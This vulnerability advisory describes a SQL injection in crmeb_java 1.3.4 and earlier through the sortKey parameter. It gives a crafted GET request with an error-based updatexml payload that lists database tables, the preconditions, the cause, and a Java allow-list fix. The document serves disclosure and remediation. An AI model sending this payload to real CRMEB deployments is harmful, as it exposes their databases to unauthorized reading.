[Suggested description]
There is a SQL injection vulnerability in crmeb_java <=1.3.4, caused by the parameter sortKey, which is interpolated in ${} format and isn't strictly filtered.
[Vulnerability details]
Make sure the user has at least two promoters.
Send the crafted request to the API endpoint /api/front/spread/people:
GET /api/front/spread/people?sortKey=updatexml(1,concat(0x7e,(select+group_concat(table_name)+from+information_schema.tables+where+table_schema%3ddatabase()),0x7e),1) HTTP/1.1
Host: 127.0.0.1:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
content-type: application/json
Authori-zation: dbdd777e27b94979adf06fc3fd20ee68
Origin: http://localhost:8082
Connection: close
Referer: http://localhost:8082/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
[Impact Code execution]
true
[Cause of vulnerability]
The endpoint /spread/people calls the function getSpreadPeopleList.
Once the user has a secondary promoter, getSpreadPeopleList is called.
There is a trick here: the ORDER BY statement is only executed if there are at least two promoters.
The parameter sortKey is in ${} format, so it is joined directly into the SQL string.
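An added example, not crmeb_java's own code, contrasting the ${} interpolation pattern the advisory describes with the usual fix of resolving the sort key through an allow-list; the SortKeyGuard class and its column names are assumptions, not taken from the project:

```java
import java.util.Map;
import java.util.Set;

public class SortKeyGuard {

    // Hypothetical allow-list: client-facing key -> real column. The project's actual
    // sortable columns are not stated in the advisory, so these names are placeholders.
    private static final Map<String, String> SORT_COLUMNS = Map.of(
            "createTime", "create_time",
            "updateTime", "update_time",
            "orderCount", "order_count");

    private static final Set<String> DIRECTIONS = Set.of("ASC", "DESC");

    /** Mirrors the vulnerable pattern: "ORDER BY ${sortKey}" drops the raw parameter into the SQL text. */
    public static String vulnerableOrderBy(String sortKey) {
        return "ORDER BY " + sortKey;
    }

    /** Hardened variant: only a known column name and a known direction can reach the SQL text. */
    public static String safeOrderBy(String sortKey, String direction) {
        String column = SORT_COLUMNS.get(sortKey);
        if (column == null) {
            throw new IllegalArgumentException("sortKey is not an allowed column");
        }
        String dir = (direction == null) ? "DESC" : direction.toUpperCase();
        if (!DIRECTIONS.contains(dir)) {
            throw new IllegalArgumentException("sort direction must be ASC or DESC");
        }
        return "ORDER BY " + column + " " + dir;
    }

    public static void main(String[] args) {
        // Constructed inputs: a legitimate key and a value that is not a column name at all.
        String good = "updateTime";
        String notAColumn = "some_function(1)";

        // The vulnerable form passes the value through untouched.
        System.out.println(vulnerableOrderBy(notAColumn));
        // The hardened form maps the key to its column and normalises the direction.
        System.out.println(safeOrderBy(good, "asc"));
        // Anything outside the allow-list is rejected before any SQL is built.
        try {
            safeOrderBy(notAColumn, "asc");
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```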
That's all, thanks.
[Vulnerability Type] SQLi
[Vendor of Product] https://github.com/crmeb/crmeb_java
[Affected Product Code Base] <=1.3.4
[Affected Component] /api/front/spread/people
[Attack Type] Remote